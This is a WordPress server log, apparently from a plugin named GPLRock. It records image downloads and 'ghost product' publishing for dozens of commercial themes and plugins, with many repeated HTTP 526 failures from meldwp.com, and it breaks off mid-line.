ninja-forms-stripe [05-Apr-2026 00:45:32 UTC] GPLRock: Image downloaded successfully for product massive-addons-for-wpbakery-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-193d71de.jpg [05-Apr-2026 00:45:32 UTC] GPLRock: Using pre-downloaded image for product massive-addons-for-wpbakery-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-193d71de.jpg [05-Apr-2026 00:45:32 UTC] GPLRock: Ghost product published with image - Product ID: massive-addons-for-wpbakery-page-builder [05-Apr-2026 00:45:33 UTC] GPLRock: Image downloaded successfully for product mythemeshop-flick-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-51ae7ad4.jpg [05-Apr-2026 00:45:33 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-flick-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-51ae7ad4.jpg [05-Apr-2026 00:45:33 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-flick-wordpress-theme [05-Apr-2026 00:45:35 UTC] GPLRock: Image downloaded successfully for product css-igniter-beaute-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ca7d5dc5.jpg [05-Apr-2026 00:45:35 UTC] GPLRock: Using pre-downloaded image for product css-igniter-beaute-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ca7d5dc5.jpg [05-Apr-2026 00:45:35 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-beaute-wordpress-theme [05-Apr-2026 00:45:37 UTC] GPLRock: Image downloaded successfully for product strata-professional-multi-purpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd1aec4a.jpg [05-Apr-2026 00:45:37 UTC] GPLRock: Using pre-downloaded image for product strata-professional-multi-purpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd1aec4a.jpg [05-Apr-2026 00:45:37 UTC] GPLRock: Ghost product published with image - Product ID: strata-professional-multi-purpose-theme [05-Apr-2026 00:45:38 UTC] GPLRock: Image downloaded successfully for product responsive-flipbook-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0ecb2386.jpg [05-Apr-2026 00:45:38 UTC] GPLRock: Using pre-downloaded image for product responsive-flipbook-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0ecb2386.jpg [05-Apr-2026 00:45:38 UTC] GPLRock: Ghost product published with image - Product ID: responsive-flipbook-plugin [05-Apr-2026 00:45:40 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-pushover-notifications (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8080c740.jpg [05-Apr-2026 00:45:40 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-pushover-notifications: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8080c740.jpg [05-Apr-2026 00:45:40 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-pushover-notifications [05-Apr-2026 00:45:41 UTC] GPLRock: Image downloaded successfully for product restrict-content-pro-custom-redirects (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f0878645.jpg [05-Apr-2026 00:45:41 UTC] GPLRock: Using pre-downloaded image for product restrict-content-pro-custom-redirects: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f0878645.jpg [05-Apr-2026 00:45:41 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-pro-custom-redirects [05-Apr-2026 00:45:43 UTC] GPLRock: Image downloaded successfully for product advanced-google-maps-plugin-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf326c0c.jpg [05-Apr-2026 00:45:43 UTC] GPLRock: Using pre-downloaded image for product advanced-google-maps-plugin-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cf326c0c.jpg [05-Apr-2026 00:45:43 UTC] GPLRock: Ghost product published with image - Product ID: advanced-google-maps-plugin-for-wordpress [05-Apr-2026 00:45:45 UTC] GPLRock: Image downloaded successfully for product wp-job-manager-apply-with-xing-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-085420ea.jpg [05-Apr-2026 00:45:45 UTC] GPLRock: Using pre-downloaded image for product wp-job-manager-apply-with-xing-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-085420ea.jpg [05-Apr-2026 00:45:45 UTC] GPLRock: Ghost product published with image - Product ID: wp-job-manager-apply-with-xing-addon [05-Apr-2026 00:49:10 UTC] GPLRock: Image download failed for product storyhub-multipurpose-wordpress-elementor-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:12 UTC] GPLRock: Image download failed for product storyhub-multipurpose-wordpress-elementor-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/storyhub---multipurpose-wordpress-elementor-blog-theme-8046.webp for product storyhub-multipurpose-wordpress-elementor-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:49:15 UTC] GPLRock: Image download failed for product storyhub-multipurpose-wordpress-elementor-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:17 UTC] GPLRock: Image download failed for product storyhub-multipurpose-wordpress-elementor-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/storyhub---multipurpose-wordpress-elementor-blog-theme-8046.webp for product storyhub-multipurpose-wordpress-elementor-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:49:19 UTC] GPLRock WARNING: Image download failed for product storyhub-multipurpose-wordpress-elementor-blog-theme. URL: https://meldwp.com/wp-content/uploads/storyhub---multipurpose-wordpress-elementor-blog-theme-8046.webp [05-Apr-2026 00:49:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: storyhub-multipurpose-wordpress-elementor-blog-theme [05-Apr-2026 00:49:19 UTC] GPLRock: Image download failed for product blobie-multiconcept-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:21 UTC] GPLRock: Image download failed for product blobie-multiconcept-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blobie---multiconcept-creative-wordpress-theme-22781.webp for product blobie-multiconcept-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:49:23 UTC] GPLRock: Image download failed for product blobie-multiconcept-creative-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:25 UTC] GPLRock: Image download failed for product blobie-multiconcept-creative-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blobie---multiconcept-creative-wordpress-theme-22781.webp for product blobie-multiconcept-creative-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:49:28 UTC] GPLRock WARNING: Image download failed for product blobie-multiconcept-creative-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/blobie---multiconcept-creative-wordpress-theme-22781.webp [05-Apr-2026 00:49:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blobie-multiconcept-creative-wordpress-theme [05-Apr-2026 00:49:28 UTC] GPLRock: Image download failed for product godlike-the-game-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:30 UTC] GPLRock: Image download failed for product godlike-the-game-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/godlike--the-game-template-30761.webp for product godlike-the-game-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:49:32 UTC] GPLRock: Image download failed for product godlike-the-game-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:34 UTC] GPLRock: Image download failed for product godlike-the-game-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/godlike--the-game-template-30761.webp for product godlike-the-game-template after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:49:36 UTC] GPLRock WARNING: Image download failed for product godlike-the-game-template. URL: https://meldwp.com/wp-content/uploads/godlike--the-game-template-30761.webp [05-Apr-2026 00:49:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: godlike-the-game-template [05-Apr-2026 00:49:37 UTC] GPLRock: Image download failed for product booco-responsive-magazine-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:39 UTC] GPLRock: Image download failed for product booco-responsive-magazine-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/booco---responsive-magazine--blog-wordpress-theme-25818.webp for product booco-responsive-magazine-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:49:41 UTC] GPLRock: Image download failed for product booco-responsive-magazine-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:43 UTC] GPLRock: Image download failed for product booco-responsive-magazine-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/booco---responsive-magazine--blog-wordpress-theme-25818.webp for product booco-responsive-magazine-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:49:45 UTC] GPLRock WARNING: Image download failed for product booco-responsive-magazine-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/booco---responsive-magazine--blog-wordpress-theme-25818.webp [05-Apr-2026 00:49:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: booco-responsive-magazine-blog-wordpress-theme [05-Apr-2026 00:49:45 UTC] GPLRock: Image download failed for product gunslinger-gun-store-hunting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:47 UTC] GPLRock: Image download failed for product gunslinger-gun-store-hunting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gunslinger--gun-store--hunting-wordpress-theme-14196.webp for product gunslinger-gun-store-hunting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:49:50 UTC] GPLRock: Image download failed for product gunslinger-gun-store-hunting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:52 UTC] GPLRock: Image download failed for product gunslinger-gun-store-hunting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gunslinger--gun-store--hunting-wordpress-theme-14196.webp for product gunslinger-gun-store-hunting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:49:54 UTC] GPLRock WARNING: Image download failed for product gunslinger-gun-store-hunting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gunslinger--gun-store--hunting-wordpress-theme-14196.webp [05-Apr-2026 00:49:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gunslinger-gun-store-hunting-wordpress-theme [05-Apr-2026 00:49:54 UTC] GPLRock: Image download failed for product infolio-digital-agency-creative-portfolio-wordpress-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:56 UTC] GPLRock: Image download failed for product infolio-digital-agency-creative-portfolio-wordpress-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:49:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infolio---digital-agency--creative-portfolio-wordpress-elementor-theme-17700.webp for product infolio-digital-agency-creative-portfolio-wordpress-elementor-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:49:58 UTC] GPLRock: Image download failed for product infolio-digital-agency-creative-portfolio-wordpress-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:00 UTC] GPLRock: Image download failed for product infolio-digital-agency-creative-portfolio-wordpress-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infolio---digital-agency--creative-portfolio-wordpress-elementor-theme-17700.webp for product infolio-digital-agency-creative-portfolio-wordpress-elementor-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:50:02 UTC] GPLRock WARNING: Image download failed for product infolio-digital-agency-creative-portfolio-wordpress-elementor-theme. URL: https://meldwp.com/wp-content/uploads/infolio---digital-agency--creative-portfolio-wordpress-elementor-theme-17700.webp [05-Apr-2026 00:50:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: infolio-digital-agency-creative-portfolio-wordpress-elementor-theme [05-Apr-2026 00:50:03 UTC] GPLRock: Image download failed for product foxiz-newspaper-news-magazine-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:05 UTC] GPLRock: Image download failed for product foxiz-newspaper-news-magazine-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foxiz---newspaper-news--magazine-wordpress-31443.webp for product foxiz-newspaper-news-magazine-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:50:07 UTC] GPLRock: Image download failed for product foxiz-newspaper-news-magazine-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:09 UTC] GPLRock: Image download failed for product foxiz-newspaper-news-magazine-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foxiz---newspaper-news--magazine-wordpress-31443.webp for product foxiz-newspaper-news-magazine-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:50:11 UTC] GPLRock WARNING: Image download failed for product foxiz-newspaper-news-magazine-wordpress. URL: https://meldwp.com/wp-content/uploads/foxiz---newspaper-news--magazine-wordpress-31443.webp [05-Apr-2026 00:50:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: foxiz-newspaper-news-magazine-wordpress [05-Apr-2026 00:50:11 UTC] GPLRock: Image downloaded successfully for product maple-clean-minimal-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-077ab604.webp [05-Apr-2026 00:50:11 UTC] GPLRock: Using pre-downloaded image for product maple-clean-minimal-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-077ab604.webp [05-Apr-2026 00:50:11 UTC] GPLRock: Ghost product published with image - Product ID: maple-clean-minimal-multi-purpose-wordpress-theme [05-Apr-2026 00:50:12 UTC] GPLRock: Image download failed for product newsblock-news-magazine-wordpress-theme-with-dark-mode (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:14 UTC] GPLRock: Image download failed for product newsblock-news-magazine-wordpress-theme-with-dark-mode (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newsblock---news--magazine-wordpress-theme-with-dark-mode-18751.webp for product newsblock-news-magazine-wordpress-theme-with-dark-mode after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:50:16 UTC] GPLRock: Image download failed for product newsblock-news-magazine-wordpress-theme-with-dark-mode (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:18 UTC] GPLRock: Image download failed for product newsblock-news-magazine-wordpress-theme-with-dark-mode (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newsblock---news--magazine-wordpress-theme-with-dark-mode-18751.webp for product newsblock-news-magazine-wordpress-theme-with-dark-mode after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:50:20 UTC] GPLRock WARNING: Image download failed for product newsblock-news-magazine-wordpress-theme-with-dark-mode. URL: https://meldwp.com/wp-content/uploads/newsblock---news--magazine-wordpress-theme-with-dark-mode-18751.webp [05-Apr-2026 00:50:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: newsblock-news-magazine-wordpress-theme-with-dark-mode [05-Apr-2026 00:50:20 UTC] GPLRock: Image download failed for product nightshade-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:22 UTC] GPLRock: Image download failed for product nightshade-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nightshade---photography-portfolio-wordpress-theme-24863.webp for product nightshade-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:50:25 UTC] GPLRock: Image download failed for product nightshade-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:27 UTC] GPLRock: Image download failed for product nightshade-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:50:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nightshade---photography-portfolio-wordpress-theme-24863.webp for product nightshade-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:50:29 UTC] GPLRock WARNING: Image download failed for product nightshade-photography-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nightshade---photography-portfolio-wordpress-theme-24863.webp [05-Apr-2026 00:50:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nightshade-photography-portfolio-wordpress-theme [05-Apr-2026 00:50:59 UTC] GPLRock: Image download failed for product pirus-dark-digital-agency-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:01 UTC] GPLRock: Image download failed for product pirus-dark-digital-agency-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pirus--dark-digital-agency-fse-wordpress-theme-29979.webp for product pirus-dark-digital-agency-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:04 UTC] GPLRock: Image download failed for product pirus-dark-digital-agency-fse-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:06 UTC] GPLRock: Image download failed for product pirus-dark-digital-agency-fse-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pirus--dark-digital-agency-fse-wordpress-theme-29979.webp for product pirus-dark-digital-agency-fse-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:08 UTC] GPLRock WARNING: Image download failed for product pirus-dark-digital-agency-fse-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pirus--dark-digital-agency-fse-wordpress-theme-29979.webp [05-Apr-2026 00:51:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pirus-dark-digital-agency-fse-wordpress-theme [05-Apr-2026 00:51:08 UTC] GPLRock: Image downloaded successfully for product nexis-ai-agency-startup-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3077d697.webp [05-Apr-2026 00:51:08 UTC] GPLRock: Using pre-downloaded image for product nexis-ai-agency-startup-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3077d697.webp [05-Apr-2026 00:51:08 UTC] GPLRock: Ghost product published with image - Product ID: nexis-ai-agency-startup-wordpress-theme [05-Apr-2026 00:51:08 UTC] GPLRock: Image download failed for product digicop-security-and-cctv-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:10 UTC] GPLRock: Image download failed for product digicop-security-and-cctv-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digicop---security-and-cctv-wordpress-theme-21845.webp for product digicop-security-and-cctv-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:12 UTC] GPLRock: Image download failed for product digicop-security-and-cctv-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:14 UTC] GPLRock: Image download failed for product digicop-security-and-cctv-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digicop---security-and-cctv-wordpress-theme-21845.webp for product digicop-security-and-cctv-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:17 UTC] GPLRock WARNING: Image download failed for product digicop-security-and-cctv-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/digicop---security-and-cctv-wordpress-theme-21845.webp [05-Apr-2026 00:51:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: digicop-security-and-cctv-wordpress-theme [05-Apr-2026 00:51:17 UTC] GPLRock: Image download failed for product flow-creative-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:19 UTC] GPLRock: Image download failed for product flow-creative-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flow---creative-blog-wordpress-theme-32125.webp for product flow-creative-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:21 UTC] GPLRock: Image download failed for product flow-creative-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:23 UTC] GPLRock: Image download failed for product flow-creative-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flow---creative-blog-wordpress-theme-32125.webp for product flow-creative-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:25 UTC] GPLRock WARNING: Image download failed for product flow-creative-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/flow---creative-blog-wordpress-theme-32125.webp [05-Apr-2026 00:51:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flow-creative-blog-wordpress-theme [05-Apr-2026 00:51:25 UTC] GPLRock: Image download failed for product interior-architecture-and-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:27 UTC] GPLRock: Image download failed for product interior-architecture-and-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/interior---architecture-and-interior-design-wordpress-theme-18615.webp for product interior-architecture-and-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:30 UTC] GPLRock: Image download failed for product interior-architecture-and-interior-design-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:32 UTC] GPLRock: Image download failed for product interior-architecture-and-interior-design-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/interior---architecture-and-interior-design-wordpress-theme-18615.webp for product interior-architecture-and-interior-design-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:34 UTC] GPLRock WARNING: Image download failed for product interior-architecture-and-interior-design-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/interior---architecture-and-interior-design-wordpress-theme-18615.webp [05-Apr-2026 00:51:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: interior-architecture-and-interior-design-wordpress-theme [05-Apr-2026 00:51:34 UTC] GPLRock: Image download failed for product amy-handmade-blog-and-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:36 UTC] GPLRock: Image download failed for product amy-handmade-blog-and-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amy-handmade---blog-and-shop-wordpress-theme-25916.webp for product amy-handmade-blog-and-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:38 UTC] GPLRock: Image download failed for product amy-handmade-blog-and-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:40 UTC] GPLRock: Image download failed for product amy-handmade-blog-and-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amy-handmade---blog-and-shop-wordpress-theme-25916.webp for product amy-handmade-blog-and-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:42 UTC] GPLRock WARNING: Image download failed for product amy-handmade-blog-and-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/amy-handmade---blog-and-shop-wordpress-theme-25916.webp [05-Apr-2026 00:51:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amy-handmade-blog-and-shop-wordpress-theme [05-Apr-2026 00:51:43 UTC] GPLRock: Image download failed for product scrollfolio-parallax-scrolling-effect-portfolio (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:45 UTC] GPLRock: Image download failed for product scrollfolio-parallax-scrolling-effect-portfolio (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/scrollfolio---parallax-scrolling-effect-portfolio-7458.webp for product scrollfolio-parallax-scrolling-effect-portfolio after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:47 UTC] GPLRock: Image download failed for product scrollfolio-parallax-scrolling-effect-portfolio (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:49 UTC] GPLRock: Image download failed for product scrollfolio-parallax-scrolling-effect-portfolio (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/scrollfolio---parallax-scrolling-effect-portfolio-7458.webp for product scrollfolio-parallax-scrolling-effect-portfolio after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:51 UTC] GPLRock WARNING: Image download failed for product scrollfolio-parallax-scrolling-effect-portfolio. URL: https://meldwp.com/wp-content/uploads/scrollfolio---parallax-scrolling-effect-portfolio-7458.webp [05-Apr-2026 00:51:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: scrollfolio-parallax-scrolling-effect-portfolio [05-Apr-2026 00:51:51 UTC] GPLRock: Image download failed for product auros-furniture-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:53 UTC] GPLRock: Image download failed for product auros-furniture-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/auros---furniture-elementor-woocommerce-theme-10913.webp for product auros-furniture-elementor-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:51:56 UTC] GPLRock: Image download failed for product auros-furniture-elementor-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:51:58 UTC] GPLRock: Image download failed for product auros-furniture-elementor-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:52:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/auros---furniture-elementor-woocommerce-theme-10913.webp for product auros-furniture-elementor-woocommerce-theme after 3 attempts. HTTP 